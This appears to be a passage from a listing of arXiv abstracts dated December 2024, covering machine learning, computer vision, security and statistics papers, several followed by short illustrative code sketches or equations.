Recent advances in deep learning and natural language generation have significantly improved image captioning, enabling automated, human-like descriptions for visual content. In this work, we apply these captioning techniques to generate clinician-like interpretations of ECG data. This study leverages existing ECG datasets accompanied by free-text reports authored by healthcare professionals (HCPs) as training data. These reports, while often inconsistent, provide a valuable foundation for automated learning. We introduce an encoder-decoder-based method that uses these reports to train models to generate detailed descriptions of ECG episodes. This represents a significant advancement in ECG analysis automation, with potential applications in zero-shot classification and automated clinical decision support. The model is tested on various datasets, including both 1- and 12-lead ECGs. It significantly outperforms the state-of-the-art reference model by Qiu et al., achieving a METEOR score of 55.53% compared to 24.51% achieved by the reference model. Furthermore, several key design choices are discussed, providing a comprehensive overview of current challenges and innovations in this domain. The source codes for this research are publicly available in our Git repository https://git.zib.de/ableich/ecg-comment-generation-public
Updated: 2024-12-05 11:05:12
Domains: cs.CL,cs.AI
FPANet: Frequency-based Video Demoireing using Frame-level Post Alignment
Moire patterns, created by the interference between overlapping grid patterns in the pixel space, degrade the visual quality of images and videos. Therefore, removing such patterns (demoireing) is crucial, yet remains a challenge due to their complexities in sizes and distortions. Conventional methods mainly tackle this task by only exploiting the spatial domain of the input images, limiting their capabilities in removing large-scale moire patterns. Therefore, this work proposes FPANet, an image-video demoireing network that learns filters in both frequency and spatial domains, improving the restoration quality by removing various sizes of moire patterns. To further enhance quality, our model takes multiple consecutive frames, learning to extract frame-invariant content features and outputting better-quality, temporally consistent images. We demonstrate the effectiveness of our proposed method on a publicly available large-scale dataset, observing that ours outperforms the state-of-the-art approaches in terms of image and video quality metrics and visual experience.
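A minimal sketch of the frequency-domain half of such a design: transform the frame with an FFT, apply a (learnable) complex mask, and transform back. This is a single-frame simplification that omits FPANet's spatial branch and frame-level post alignment.

```python
import torch

def frequency_filter(x, filt):
    """FFT the frames, apply a complex-valued mask, and invert. Large
    (low-frequency) moire structure is easier to suppress here than
    with purely spatial convolutions."""
    X = torch.fft.fft2(x)                  # complex spectrum, (B, C, H, W)
    return torch.fft.ifft2(X * filt).real

B, C, H, W = 2, 3, 64, 64
x = torch.randn(B, C, H, W)                       # a batch of video frames
filt = torch.ones(C, H, W, dtype=torch.cfloat)    # learned in practice
y = frequency_filter(x, filt)                     # same shape as x
```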
Updated: 2024-12-05 11:03:41
Domains: cs.CV,cs.AI
Online SLA Decomposition: Enabling Real-Time Adaptation to Evolving Systems
When a network slice spans multiple technology domains, it is crucial for each domain to uphold the End-to-End (E2E) Service Level Agreement (SLA) associated with the slice. Consequently, the E2E SLA must be properly decomposed into partial SLAs that are assigned to each domain involved. In a network slice management system with a two-level architecture, comprising an E2E service orchestrator and local domain controllers, we consider that the orchestrator has access solely to historical data regarding the responses of local controllers to previous requests, and this information is used to construct a risk model for each domain. In this study, we extend our previous work by investigating the dynamic nature of real-world systems and introducing an online learning-decomposition framework to tackle the dynamicity. We propose a framework that periodically updates the risk models based on the most recent feedback. This approach leverages key components such as online gradient descent and FIFO memory buffers, which enhance the stability and robustness of the overall process. Our empirical study on an analytic model-based simulator demonstrates that the proposed framework outperforms the state-of-the-art static approach, providing more accurate and resilient SLA decomposition even under varying conditions and limited data scenarios.
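A minimal sketch of the two components called out above, online gradient descent over a FIFO buffer of recent feedback, for one domain's risk model. The logistic form and the feature layout are illustrative assumptions, not the paper's exact model.

```python
from collections import deque
import numpy as np

class OnlineRiskModel:
    """Per-domain risk model updated periodically with online gradient
    descent over a FIFO buffer of recent (partial-SLA, accepted) feedback."""
    def __init__(self, dim, lr=0.05, buffer_size=256):
        self.w = np.zeros(dim)
        self.lr = lr
        self.buffer = deque(maxlen=buffer_size)   # stale feedback falls out

    def observe(self, x, accepted):
        self.buffer.append((x, float(accepted)))

    def update(self):
        for x, y in self.buffer:                  # one OGD pass per period
            p = 1.0 / (1.0 + np.exp(-self.w @ x)) # predicted acceptance prob
            self.w -= self.lr * (p - y) * x       # logistic-loss gradient

model = OnlineRiskModel(dim=3)
model.observe(np.array([0.2, 0.5, 1.0]), accepted=True)
model.update()
```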
Updated: 2024-12-05 11:01:30
Domains: cs.NI,cs.AI,cs.LG
Space to Policy: Scalable Brick Kiln Detection and Automatic Compliance Monitoring with Geospatial Data
Air pollution kills 7 million people annually. The brick kiln sector significantly contributes to economic development but also accounts for 8-14% of air pollution in India. Policymakers have implemented compliance measures to regulate brick kilns. Emission inventories are critical for air quality modeling and source apportionment studies. However, the largely unorganized nature of the brick kiln sector necessitates labor-intensive survey efforts for monitoring. Recent efforts by air quality researchers have relied on manual annotation of brick kilns using satellite imagery to build emission inventories, but this approach lacks scalability. Machine-learning-based object detection methods have shown promise for detecting brick kilns; however, previous studies often rely on costly high-resolution imagery and fail to integrate with governmental policies. In this work, we developed a scalable machine-learning pipeline that detected and classified 30638 brick kilns across five states in the Indo-Gangetic Plain using free, moderate-resolution satellite imagery from Planet Labs. Our detections have a high correlation with on-ground surveys. We performed automated compliance analysis based on government policies. In the Delhi airshed, stricter policy enforcement has led to the adoption of efficient brick kiln technologies. This study highlights the need for inclusive policies that balance environmental sustainability with the livelihoods of workers.
Updated: 2024-12-05 10:59:54
Domains: cs.LG
Graph Neural Networks Need Cluster-Normalize-Activate Modules
Graph Neural Networks (GNNs) are non-Euclidean deep learning models for graph-structured data. Despite their successful and diverse applications, GNNs suffer from oversmoothing, which prohibits deep architectures because node features converge to a single fixed point. This severely limits their potential to solve complex tasks. To counteract this tendency, we propose a plug-and-play module consisting of three steps: Cluster-Normalize-Activate (CNA). By applying CNA modules, GNNs search for and form super nodes in each layer, which are normalized and activated individually. We demonstrate in node classification and property prediction tasks that CNA significantly improves accuracy over the state-of-the-art. In particular, CNA reaches 94.18% and 95.75% accuracy on Cora and CiteSeer, respectively. It also benefits GNNs in regression tasks, reducing the mean squared error compared to all baselines. At the same time, GNNs with CNA require substantially fewer learnable parameters than competing architectures.
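A toy version of a Cluster-Normalize-Activate step on node features, using a few k-means-style iterations for the clustering (the paper's exact clustering, normalization, and activation choices may differ):

```python
import torch
import torch.nn.functional as F

def cluster_normalize_activate(h, num_clusters=4, iters=5):
    """Toy CNA step: (1) cluster node features with a few k-means-style
    updates, (2) normalize features within each cluster, (3) activate.
    Per-cluster statistics counteract all nodes collapsing to one point."""
    centers = h[torch.randperm(h.size(0))[:num_clusters]].clone()
    for _ in range(iters):
        assign = torch.cdist(h, centers).argmin(dim=1)
        for c in range(num_clusters):
            if (assign == c).any():
                centers[c] = h[assign == c].mean(dim=0)
    out = torch.empty_like(h)
    for c in range(num_clusters):
        mask = assign == c
        if mask.any():
            hc = h[mask]
            out[mask] = (hc - hc.mean(0)) / (hc.std(0, unbiased=False) + 1e-5)
    return F.gelu(out)

h = torch.randn(100, 16)               # node features after message passing
h = cluster_normalize_activate(h)      # one CNA module application
```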
Updated: 2024-12-05 10:59:20
Domains: cs.LG,cs.AI,68T07,I.2.0
Deep learning empowered sensor fusion boosts infant movement classification
To assess the integrity of the developing nervous system, the Prechtl general movement assessment (GMA) is recognized for its clinical value in diagnosing neurological impairments in early infancy. GMA has been increasingly augmented through machine learning approaches intended to scale up its application, circumvent costs in the training of human assessors, and further standardize classification of spontaneous motor patterns. Available deep learning tools, all of which are based on single sensor modalities, are, however, still considerably inferior to well-trained human assessors. These approaches are hardly comparable, as all models are designed, trained, and evaluated on proprietary/silo data sets. With this study we propose a sensor fusion approach for assessing fidgety movements (FMs). FMs were recorded from 51 typically developing participants. We compared three different sensor modalities (pressure, inertial, and visual sensors). Various combinations and two sensor fusion approaches (late and early fusion) for infant movement classification were tested to evaluate whether a multi-sensor system outperforms single-modality assessments. Convolutional neural network (CNN) architectures were used to classify movement patterns. The performance of the three-sensor fusion (classification accuracy of 94.5%) was significantly higher than that of any single modality evaluated. We show that the sensor fusion approach is a promising avenue for automated classification of infant motor patterns. The development of a robust sensor fusion system may significantly enhance AI-based early recognition of neurofunctions, ultimately facilitating automated early detection of neurodevelopmental conditions.
Updated: 2024-12-05 10:57:12
Domains: cs.LG,cs.AI
ZipAR: Accelerating Autoregressive Image Generation through Spatial Locality
In this paper, we propose ZipAR, a training-free, plug-and-play parallel decoding framework for accelerating auto-regressive (AR) visual generation. The motivation stems from the observation that images exhibit local structures, and spatially distant regions tend to have minimal interdependence. Given a partially decoded set of visual tokens, in addition to the original next-token prediction scheme in the row dimension, the tokens corresponding to spatially adjacent regions in the column dimension can be decoded in parallel, enabling the "next-set prediction" paradigm. By decoding multiple tokens simultaneously in a single forward pass, the number of forward passes required to generate an image is significantly reduced, resulting in a substantial improvement in generation efficiency. Experiments demonstrate that ZipAR can reduce the number of model forward passes by up to 91% on the Emu3-Gen model without requiring any additional retraining.
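Conceptually, the speed-up comes from a decoding schedule in which row $r$ may begin once row $r-1$ is a few tokens ahead, so several rows advance concurrently. A sketch of such a schedule (the lag value is illustrative, not the paper's setting):

```python
def zipar_schedule(H, W, lag=4):
    """Group grid positions into parallel decoding sets: position (r, c)
    becomes decodable at step r * lag + c, so row r trails row r - 1 by
    `lag` tokens and many rows advance in the same forward pass."""
    steps = {}
    for r in range(H):
        for c in range(W):
            steps.setdefault(r * lag + c, []).append((r, c))
    return [steps[t] for t in sorted(steps)]

sets = zipar_schedule(H=8, W=32, lag=4)
print(len(sets), "forward passes instead of", 8 * 32)  # 60 instead of 256
# Each inner list is one "next set" decoded in a single forward pass.
```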
Updated: 2024-12-05 10:57:08
Domains: cs.CV,cs.AI
Expanding Deep Learning-based Sensing Systems with Multi-Source Knowledge Transfer
Expanding existing sensing systems to provide high-quality deep learning models for more domains, such as new users or environments, is challenged by limited labeled data and by data and device heterogeneity. While knowledge distillation methods can overcome label scarcity and device heterogeneity, they assume the teachers are fully reliable and overlook data heterogeneity, which prevents the direct adoption of existing models. To address this problem, this paper proposes an efficient knowledge transfer framework, HaKT, to expand sensing systems. It first selects multiple high-quality models from the system at low cost and then fuses their knowledge by assigning sample-wise weights to their predictions. Later, the fused knowledge is selectively injected into the customized models for new domains based on the knowledge quality. Extensive experiments on different tasks, modalities, and settings show that HaKT outperforms state-of-the-art baselines by up to 16.5% in accuracy and saves up to 39% communication traffic.
Updated: 2024-12-05 10:55:54
Domains: cs.AI
From Code to Play: Benchmarking Program Search for Games Using Large Language Models
Large language models (LLMs) have shown impressive capabilities in generating program code, opening exciting opportunities for applying program synthesis to games. In this work, we explore the potential of LLMs to directly synthesize usable code for a wide range of gaming applications, focusing on two programming languages, Python and Java. We use an evolutionary hill-climbing algorithm, where the mutations and seeds of the initial programs are controlled by LLMs. For Python, the framework covers various game-related tasks, including five miniature versions of Atari games, ten levels of Baba is You, an environment inspired by Asteroids, and a maze generation task. For Java, the framework contains 12 games from the TAG tabletop games framework. Across 29 tasks, we evaluated 12 language models for Python and 8 for Java. Our findings suggest that the performance of LLMs depends more on the task than on model size. While larger models generate more executable programs, these do not always result in higher-quality solutions but are much more expensive. No model has a clear advantage, although on any specific task, one model may be better. Trying many models on a problem and using the best results across them is more reliable than using just one.
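The evolutionary hill-climbing loop is easy to sketch; both helpers below are hypothetical placeholders for the real LLM mutation call and the in-game fitness evaluation:

```python
import random

def llm_mutate(program: str) -> str:
    """Placeholder for an LLM call that returns a mutated program; in
    the benchmark the mutation prompt goes to a real model and the reply
    is parsed back into code."""
    return program + f"\n# variant {random.randint(0, 9999)}"

def evaluate(program: str) -> float:
    """Placeholder fitness: run the candidate in the game and score it."""
    return random.random()

def hill_climb(seed_program, iterations=50):
    best, best_score = seed_program, evaluate(seed_program)
    for _ in range(iterations):
        cand = llm_mutate(best)           # LLM proposes the mutation
        score = evaluate(cand)
        if score > best_score:            # keep only improvements
            best, best_score = cand, score
    return best, best_score

program, score = hill_climb("def policy(obs):\n    return 0\n")
```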
Updated: 2024-12-05 10:50:58
Domains: cs.AI
AdamMCMC: Combining Metropolis Adjusted Langevin with Momentum-based Optimization
Uncertainty estimation is a key issue when considering the application of deep neural network methods in science and engineering. In this work, we introduce a novel algorithm that quantifies epistemic uncertainty via Monte Carlo sampling from a tempered posterior distribution. It combines the well-established Metropolis Adjusted Langevin Algorithm (MALA) with momentum-based optimization using Adam, and leverages a prolate proposal distribution to efficiently draw from the posterior. We prove that the constructed chain admits the Gibbs posterior as its invariant distribution and approximates this posterior in total variation distance. Furthermore, we demonstrate the efficiency of the resulting algorithm and the merit of the proposed changes on a state-of-the-art classifier from high-energy particle physics.
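For orientation, a plain MALA step looks like the sketch below; AdamMCMC additionally preconditions the drift with Adam-style momentum and draws from a prolate proposal, both of which are omitted here.

```python
import numpy as np

def mala_step(theta, log_p, grad_log_p, eps, rng):
    """One Metropolis Adjusted Langevin step: Langevin proposal plus a
    Metropolis-Hastings correction that keeps log_p invariant."""
    def log_q(x, mean):  # log density of the Gaussian proposal (up to const)
        return -np.sum((x - mean) ** 2) / (2 * eps ** 2)
    mean_fwd = theta + 0.5 * eps ** 2 * grad_log_p(theta)
    prop = mean_fwd + eps * rng.normal(size=theta.shape)
    mean_rev = prop + 0.5 * eps ** 2 * grad_log_p(prop)
    log_alpha = (log_p(prop) + log_q(theta, mean_rev)
                 - log_p(theta) - log_q(prop, mean_fwd))
    return prop if np.log(rng.uniform()) < log_alpha else theta

# Toy tempered posterior: a standard Gaussian in 10 dimensions.
log_p = lambda x: -0.5 * np.sum(x ** 2)
grad = lambda x: -x
rng = np.random.default_rng(0)
theta = np.zeros(10)
for _ in range(100):
    theta = mala_step(theta, log_p, grad, eps=0.5, rng=rng)
```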
Updated: 2024-12-05 10:49:37
Domains: stat.ML,cs.LG,hep-ph,stat.CO
How to design a Public Key Infrastructure for a Central Bank Digital Currency
Central Bank Digital Currency (CBDC) is a new form of money, issued by a country's or region's central bank, that can be used for a variety of payment scenarios. Depending on its concrete implementation, there are many participants in a production CBDC ecosystem, including the central bank, commercial banks, merchants, individuals, and wallet providers. There is a need for robust and scalable Public Key Infrastructure (PKI) for CBDC to ensure the continued trust of all entities in the system. This paper discusses the criteria that should flow into the design of a PKI and proposes a certificate hierarchy, together with a rollover concept ensuring continuous operation of the system. We further consider several peculiarities, such as the circulation of offline-capable hardware wallets.
Updated: 2024-12-05 10:41:38
Domains: cs.CR,cs.NI,C.2.0; K.4.4; K.6.5
Iterative Reweighted Framework Based Algorithms for Sparse Linear Regression with Generalized Elastic Net Penalty
The elastic net penalty is frequently employed in high-dimensional statistics for parameter regression and variable selection. It is particularly beneficial compared to the lasso when the number of predictors greatly surpasses the number of observations. However, empirical evidence has shown that the $\ell_q$-norm penalty (where $0 < q < 1$) often provides better regression than the $\ell_1$-norm penalty, demonstrating enhanced robustness in various scenarios. In this paper, we explore a generalized elastic net model that employs an $\ell_r$-norm (where $r \geq 1$) in the loss function to accommodate various types of noise, and an $\ell_q$-norm (where $0 < q < 1$) to replace the $\ell_1$-norm in the elastic net penalty. Theoretically, we establish computable lower bounds for the nonzero entries of the generalized first-order stationary points of the proposed generalized elastic net model. For implementation, we develop two efficient algorithms based on the locally Lipschitz continuous $\epsilon$-approximation to the $\ell_q$-norm. The first algorithm employs an alternating direction method of multipliers (ADMM), while the second utilizes a proximal majorization-minimization method (PMM), where the subproblems are addressed using the semismooth Newton method (SSN). We also perform extensive numerical experiments with both simulated and real data, showing that both algorithms demonstrate superior performance. Notably, PMM-SSN is more efficient than ADMM, even though the latter offers a simpler implementation.
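Based on the description above, one plausible way to write the model's objective is the following; the adaptive weights $w_j$ and the exact balance of the two penalty terms are inferred from the abstract, not quoted from the paper.

```latex
\min_{\beta \in \mathbb{R}^p}
  \|y - X\beta\|_r^r
  + \lambda_1 \sum_{j=1}^{p} w_j \,\lvert \beta_j \rvert^{q}
  + \lambda_2 \|\beta\|_2^2,
\qquad r \ge 1, \quad 0 < q < 1,
```

where the $w_j > 0$ are adaptive coefficients and $\lambda_1, \lambda_2 \ge 0$ control the sparsity-inducing $\ell_q$ term and the ridge term, respectively.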
Updated: 2024-12-05 10:40:41
Domains: stat.ML,cs.LG,math.ST,stat.TH
Pathwise optimization for bridge-type estimators and its applications
Sparse parametric models are of great interest in statistical learning and are often analyzed by means of regularized estimators. Pathwise methods allow one to efficiently compute the full solution path for penalized estimators, for any possible value of the penalization parameter $\lambda$. In this paper we deal with pathwise optimization for bridge-type problems; i.e., we are interested in the minimization of a loss function, such as negative log-likelihood or residual sum of squares, plus the sum of $\ell^q$ norms with $q\in(0,1]$ involving adaptive coefficients. For some loss functions this regularization asymptotically achieves the oracle properties (such as selection consistency). Nevertheless, since the objective function involves nonconvex and nondifferentiable terms, the minimization problem is computationally challenging. The aim of this paper is to apply some general algorithms, arising from nonconvex optimization theory, to compute efficiently the path solutions for the adaptive bridge estimator with multiple penalties. In particular, we take into account two different approaches: accelerated proximal gradient descent and blockwise alternating optimization. The convergence and the path consistency of these algorithms are discussed. In order to assess our methods, we apply these algorithms to the penalized estimation of diffusion processes observed at discrete times. The latter represents a recent research topic in the field of statistics for time-dependent data.
Updated: 2024-12-05 10:38:29
Domains: stat.ML,cs.LG,math.ST,stat.CO,stat.TH
AI4EF: Artificial Intelligence for Energy Efficiency in the Building Sector
AI4EF, Artificial Intelligence for Energy Efficiency, is an advanced, user-centric tool designed to support decision-making in building energy retrofitting and efficiency optimization. Leveraging machine learning (ML) and data-driven insights, AI4EF enables stakeholders such as public sector representatives, energy consultants, and building owners to model, analyze, and predict the energy consumption, retrofit costs, and environmental impacts of building upgrades. Featuring a modular framework, AI4EF includes customizable building retrofitting, photovoltaic installation assessment, and predictive modeling tools that allow users to input building parameters and receive tailored recommendations for achieving energy savings and carbon reduction goals. Additionally, the platform incorporates a Training Playground for data scientists to refine the ML models used by the framework. Finally, AI4EF provides access to the Enershare Data Space to facilitate seamless data sharing and access within the ecosystem. Its compatibility with the open-source identity management system Keycloak enhances security and accessibility, making it adaptable to various regulatory and organizational contexts. This paper presents an architectural overview of AI4EF, its application in energy efficiency scenarios, and its potential for advancing sustainable energy practices through artificial intelligence (AI).
Updated: 2024-12-05 10:36:39
Domains: cs.LG
Hybrid-SQuAD: Hybrid Scholarly Question Answering Dataset
Existing Scholarly Question Answering (QA) methods typically target homogeneous data sources, relying solely on either text or Knowledge Graphs (KGs). However, scholarly information often spans heterogeneous sources, necessitating the development of QA systems that integrate information from multiple heterogeneous data sources. To address this challenge, we introduce Hybrid-SQuAD (Hybrid Scholarly Question Answering Dataset), a novel large-scale QA dataset designed to facilitate answering questions incorporating both text and KG facts. The dataset consists of 10.5K question-answer pairs generated by a large language model, leveraging the KGs DBLP and SemOpenAlex alongside corresponding text from Wikipedia. In addition, we propose a RAG-based baseline hybrid QA model, achieving an exact match score of 69.65 on the Hybrid-SQuAD test set.
Updated: 2024-12-05 10:30:56
Domains: cs.CL,cs.AI
Kernel-Based Optimal Control: An Infinitesimal Generator Approach
This paper presents a novel approach for optimal control of nonlinear stochastic systems using infinitesimal generator learning within infinite-dimensional reproducing kernel Hilbert spaces. Our learning framework leverages data samples of system dynamics and stage cost functions, with only control penalties and constraints provided. The proposed method directly learns the diffusion operator of a controlled Fokker-Planck-Kolmogorov equation in an infinite-dimensional hypothesis space. This operator models the continuous-time evolution of the probability measure of the control system's state. We demonstrate that this approach seamlessly integrates with modern convex operator-theoretic Hamilton-Jacobi-Bellman recursions, enabling a data-driven solution to the optimal control problem. Furthermore, our statistical learning framework includes nonparametric estimators for uncontrolled forward infinitesimal generators as a special case. Numerical experiments, ranging from synthetic differential equations to simulated robotic systems, showcase the advantages of our approach compared to both modern data-driven and classical nonlinear programming methods for optimal control.
Updated: 2024-12-05 10:22:00
Domains: math.OC,cs.LG,cs.RO,cs.SY,eess.SY,stat.ML
INFP: Audio-Driven Interactive Head Generation in Dyadic Conversations
Imagine having a conversation with a socially intelligent agent. It can attentively listen to your words and offer visual and linguistic feedback promptly. This seamless interaction allows multiple rounds of conversation to flow smoothly and naturally. To realize this, we propose INFP, a novel audio-driven head generation framework for dyadic interaction. Unlike previous head generation works that only focus on single-sided communication, or require manual role assignment and explicit role switching, our model dynamically drives the agent portrait to alternate between speaking and listening states, guided by the input dyadic audio. Specifically, INFP comprises a Motion-Based Head Imitation stage and an Audio-Guided Motion Generation stage. The first stage learns to project facial communicative behaviors from real-life conversation videos into a low-dimensional motion latent space, and uses the motion latent codes to animate a static image. The second stage learns the mapping from the input dyadic audio to motion latent codes through denoising, leading to audio-driven head generation in interactive scenarios. To facilitate this line of research, we introduce DyConv, a large-scale dataset of rich dyadic conversations collected from the Internet. Extensive experiments and visualizations demonstrate the superior performance and effectiveness of our method. Project Page: https://grisoon.github.io/INFP/.
Updated: 2024-12-05 10:20:34
Domain: cs.CV,cs.AI
SocialMind: LLM-based Proactive AR Social Assistive System with Human-like Perception for In-situ Live Interactions
Social interactions are fundamental to human life. The recent emergence of large language models (LLMs)-based virtual assistants has demonstrated their potential to revolutionize human interactions and lifestyles. However, existing assistive systems mainly provide reactive services to individual users, rather than offering in-situ assistance during live social interactions with conversational partners. In this study, we introduce SocialMind, the first LLM-based proactive AR social assistive system that provides users with in-situ social assistance. SocialMind employs human-like perception leveraging multi-modal sensors to extract both verbal and nonverbal cues, social factors, and implicit personas, incorporating these social cues into LLM reasoning for social suggestion generation. Additionally, SocialMind employs a multi-tier collaborative generation strategy and proactive update mechanism to display social suggestions on Augmented Reality (AR) glasses, ensuring that suggestions are timely provided to users without disrupting the natural flow of conversation. Evaluations on three public datasets and a user study with 20 participants show that SocialMind achieves 38.3% higher engagement compared to baselines, and 95% of participants are willing to use SocialMind in their live social interactions.
Updated: 2024-12-05 10:19:36
Domain: cs.AI
Dynamic Graph Representation with Contrastive Learning for Financial Market Prediction: Integrating Temporal Evolution and Static Relations
Temporal Graph Learning (TGL) is crucial for capturing the evolving nature of stock markets. Traditional methods often ignore the interplay between dynamic temporal changes and static relational structures between stocks. To address this issue, we propose the Dynamic Graph Representation with Contrastive Learning (DGRCL) framework, which integrates dynamic and static graph relations to improve the accuracy of stock trend prediction. Our framework introduces two key components: the Embedding Enhancement (EE) module and the Contrastive Constrained Training (CCT) module. The EE module focuses on dynamically capturing the temporal evolution of stock data, while the CCT module enforces static constraints based on stock relations, refined within contrastive learning. This dual-relation approach allows for a more comprehensive understanding of stock market dynamics. Our experiments on two major U.S. stock market datasets, NASDAQ and NYSE, demonstrate that DGRCL significantly outperforms state-of-the-art TGL baselines. Ablation studies indicate the importance of both modules. Overall, DGRCL not only enhances prediction ability but also provides a robust framework for integrating temporal and relational data in dynamic graphs. Code and data are available for public access.
Updated: 2024-12-05 10:15:56
Domain: cs.LG,cs.NE,q-fin.CP
Dimension Reduction via Random Projection for Privacy in Multi-Agent Systems
The agents in a Multi-Agent System (MAS) make observations about the system and send that information to a fusion center. The fusion center aggregates the information and draws conclusions about the system parameters as accurately as possible. However, for the sake of the efficiency of the system at large, the agents need to append some private parameters to the observed data. In this scenario, the data sent to the fusion center faces privacy risks: it must be secured against privacy breaches and inference attacks in a decentralized manner. This, in turn, leads to a loss of utility of the data sent to the fusion center. We quantify the utility and privacy of the system using cosine similarity. We formulate our MAS problem as one of concept deduction, for which compression-based methods exist in the literature. We then propose a novel sanitization mechanism for our MAS using one such compression-based method while addressing the utility-privacy tradeoff problem.
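For intuition, here is a minimal sketch (not the paper's sanitization mechanism) of the compression primitive involved: a Gaussian random projection that reduces dimension while approximately preserving the cosine similarities the paper uses to quantify utility.

```python
import numpy as np

rng = np.random.default_rng(42)

def random_projection(X, k):
    # Project D-dimensional rows of X to k dimensions with a Gaussian
    # random matrix; the 1/sqrt(k) scaling roughly preserves geometry.
    D = X.shape[1]
    R = rng.normal(size=(D, k)) / np.sqrt(k)
    return X @ R

def cosine(u, v):
    return u @ v / (np.linalg.norm(u) * np.linalg.norm(v))

# Agents' observations with appended private parameters (toy data).
X = rng.normal(size=(10, 512))
Z = random_projection(X, 64)   # sanitized, lower-dimensional view

# Utility proxy: pairwise cosine similarities are approximately preserved.
print(cosine(X[0], X[1]), cosine(Z[0], Z[1]))
```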
Updated: 2024-12-05 10:09:13
Domain: cs.CR
Bayesian Networks for Causal Analysis in Socioecological Systems
Causal and counterfactual reasoning are emerging directions in data science that allow us to reason about hypothetical scenarios. This is particularly useful in fields like environmental and ecological sciences, where interventional data are usually not available. Structural causal models are probabilistic models for causal analysis that simplify this kind of reasoning due to their graphical representation. They can be regarded as extensions of the so-called Bayesian networks, a well known modeling tool commonly used in environmental and ecological problems. The main contribution of this paper is to analyze the relations of necessity and sufficiency between the variables of a socioecological system using counterfactual reasoning with Bayesian networks. In particular, we consider a case study involving socioeconomic factors and land-uses in southern Spain. In addition, this paper aims to be a coherent overview of the fundamental concepts for applying counterfactual reasoning, so that environmental researchers with a background in Bayesian networks can easily take advantage of the structural causal model formalism.
Updated: 2024-12-05 10:06:43
Domain: cs.AI,math.PR,stat.AP
Considerations Influencing Offense-Defense Dynamics From Artificial Intelligence
The rapid advancement of artificial intelligence (AI) technologies presents profound challenges to societal safety. As AI systems become more capable, accessible, and integrated into critical services, the dual nature of their potential is increasingly clear. While AI can enhance defensive capabilities in areas like threat detection, risk assessment, and automated security operations, it also presents avenues for malicious exploitation and large-scale societal harm, for example through automated influence operations and cyber attacks. Understanding the dynamics that shape AI's capacity to both cause harm and enhance protective measures is essential for informed decision-making regarding the deployment, use, and integration of advanced AI systems. This paper builds on recent work on offense-defense dynamics within the realm of AI, proposing a taxonomy to map and examine the key factors that influence whether AI systems predominantly pose threats or offer protective benefits to society. By establishing a shared terminology and conceptual foundation for analyzing these interactions, this work seeks to facilitate further research and discourse in this critical area.
Updated: 2024-12-05 10:05:53
Domain: cs.AI
Quest: Query-centric Data Synthesis Approach for Long-context Scaling of Large Language Model
Recent advancements in large language models (LLMs) have highlighted the importance of extending context lengths for handling complex tasks. While traditional methods for training on long contexts often use filtered long documents, these approaches lead to domain imbalances, limiting model performance. To address this, techniques like random document concatenation (Standard) and similarity-based methods (KNN, ICLM) have been developed. However, they either sacrifice semantic coherence or diversity. To balance both aspects, we introduce Quest, a query-centric data synthesis method aggregating semantically relevant yet diverse documents. Quest uses a generative model to predict potential queries for each document, grouping documents with similar queries and keywords. Extensive experiments demonstrate Quest's superior performance on long-context tasks, achieving remarkable results with context lengths of up to 1M tokens and confirming its scalability across various model sizes.
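A toy sketch of the query-centric grouping idea follows; `predict_query` is a hypothetical stand-in for the paper's generative query predictor, replaced here by crude keyword extraction.

```python
from collections import defaultdict

def predict_query(doc: str) -> str:
    """Hypothetical stand-in for Quest's generative query predictor;
    here it just keeps the first three distinct words as a crude query."""
    words = [w.lower().strip(".,") for w in doc.split()]
    return " ".join(list(dict.fromkeys(words))[:3])

def quest_group(docs, max_len=1000):
    """Group documents whose predicted queries share keywords, then
    concatenate each group into one long-context training sample."""
    buckets = defaultdict(list)
    for doc in docs:
        key = frozenset(predict_query(doc).split())
        # Merge into the first existing bucket with overlapping keywords.
        match = next((k for k in buckets if k & key), key)
        buckets[match].append(doc)
    return ["\n\n".join(group)[:max_len] for group in buckets.values()]

docs = ["solar panels convert sunlight into power",
        "solar energy adoption is growing fast",
        "gradient descent minimizes a loss function"]
print(quest_group(docs))  # the two 'solar' documents land in one sample
```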
Updated: 2024-12-05 09:56:35
Domain: cs.CL,cs.AI
(Blind) Users Really Do Heed Aural Telephone Scam Warnings
This paper reports on a study exploring how two groups of individuals, legally blind (n=36) and sighted ones (n=36), react to aural telephone scam warnings in naturalistic settings. As spoofing a CallerID is trivial, communicating the context of an incoming call instead offers a better possibility to warn a receiver about a potential scam. Usually, such warnings are visual in nature and fail to cater to users with visual disabilities. To address this exclusion, we developed an aural variant of telephone scam warnings and tested them in three conditions: baseline (no warning), short warning, and contextual warning that preceded the scam's content. We tested the two most common scam scenarios: fraud (interest rate reduction) and identity theft (social security number) by cold-calling participants and recording their actions, then debriefing them and obtaining consent afterward. Only two participants "pressed one" as the scam demanded, both from the legally blind group that heard the contextual warning for the social security scenario. Upon close inspection, we learned that one of them did so because of accessibility issues with their screen reader and the other did so intentionally because the warning convinced them to waste the scammer's time, so they don't scam vulnerable people. Both the legally blind and the sighted participants found the contextual warnings to be powerful usable security cues that, together with STIR/SHAKEN indicators like "Scam Likely", would provide robust protection against any type of scam. We also discussed the potential privacy implications of the contextual warnings and collected recommendations for usably accessible implementation.
Updated: 2024-12-05 09:47:38
Domain: cs.CR
Relax and Merge: A Simple Yet Effective Framework for Solving Fair $k$-Means and $k$-sparse Wasserstein Barycenter Problems
The fairness of clustering algorithms has gained widespread attention across various areas, including machine learning. In this paper, we study fair $k$-means clustering in Euclidean space. Given a dataset comprising several groups, the fairness constraint requires that each cluster should contain a proportion of points from each group within specified lower and upper bounds. Due to these fairness constraints, determining the optimal locations of $k$ centers is a quite challenging task. We propose a novel ``Relax and Merge'' framework that returns a $(1+4\rho + O(\epsilon))$-approximate solution, where $\rho$ is the approximation ratio of an off-the-shelf vanilla $k$-means algorithm and $O(\epsilon)$ can be an arbitrarily small positive number. If equipped with a PTAS of $k$-means, our solution can achieve an approximation ratio of $(5+O(\epsilon))$ with only a slight violation of the fairness constraints, which improves the current state-of-the-art approximation guarantee. Furthermore, using our framework, we can also obtain a $(1+4\rho +O(\epsilon))$-approximate solution for the $k$-sparse Wasserstein Barycenter problem, which is a fundamental optimization problem in the field of optimal transport, and a $(2+6\rho)$-approximate solution for the strictly fair $k$-means clustering with no violation, both of which are better than the current state-of-the-art methods. In addition, the empirical results demonstrate that our proposed algorithm can significantly outperform baseline approaches in terms of clustering cost.
Updated: 2024-12-05 09:45:55
Domain: cs.LG,cs.DS,stat.ML
A Note on Spectral Map
